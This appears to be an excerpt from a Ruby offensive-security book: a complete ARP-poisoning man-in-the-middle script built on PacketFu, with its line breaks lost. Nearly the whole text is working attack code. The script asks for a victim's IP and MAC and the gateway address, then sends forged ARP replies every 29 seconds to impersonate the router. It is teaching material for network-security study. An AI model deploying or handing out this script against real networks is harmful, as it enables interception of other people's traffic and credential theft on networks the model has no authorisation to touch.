Example of a more elaborate MiTM attack using ARP Poisoning with PacketFU and socket using source code in this book as base.
require 'packetfu'require 'socket'​def poison(lip, lmac, vip, vmac, rip, int_name)puts "Sending ARP Packet Spoof Every 29 Seconds…"x = PacketFu::ARPPacket.new(:flavor => "Linux")x.eth_saddr = lmac # your MAC Addressx.eth_daddr = vmac # victim MAC Addressx.arp_saddr_mac = lmac # your MAC Addressx.arp_daddr_mac = vmac # victim MAC Addressx.arp_saddr_ip = rip # Router IP Addressx.arp_daddr_ip= vip # Victim IP Addressx.arp_opcode = 2 # ARP Reply Codewhile true dox.to_w(int_name) # Put Packet to wire interfacesleep(29) # interval in seconds, change for your preferenceendend​def get_ifconfig(int_name)int_config = PacketFu::Utils.whoami?(:iface => int_name)return int_config[:ip_saddr], int_config[:eth_saddr]end​def get_victim_infoputs "enter victim ip"vip = getsputs "enter victim MAC"vmac = getsputs "enter gateway ip"rip = getsreturn vip, vmac, ripend​# need to be root to run thisunless Process.uid.zero?puts "you need to run this script as root!"exit 0end​# select interface to use and start setupinterfaces = Socket.getifaddrs.map { |i| i.name }.compact.uniqlist = Hash[(0...interfaces.size).zip interfaces]list.each do |l, v|puts "#{l} #{v}"end​puts "enter interface number to use on MITM"int_number = getsif list.key?(int_number.to_i)lip, lmac = get_ifconfig(list.fetch(int_number.to_i))vip, vmac, rip = get_victim_info()poison(lip, lmac, vip, vmac, rip, list.fetch(int_number.to_i))elseputs "Selected interface does not exists"end
Source: Ruby-MiTM and Rubyfu ARP Spoofing topic.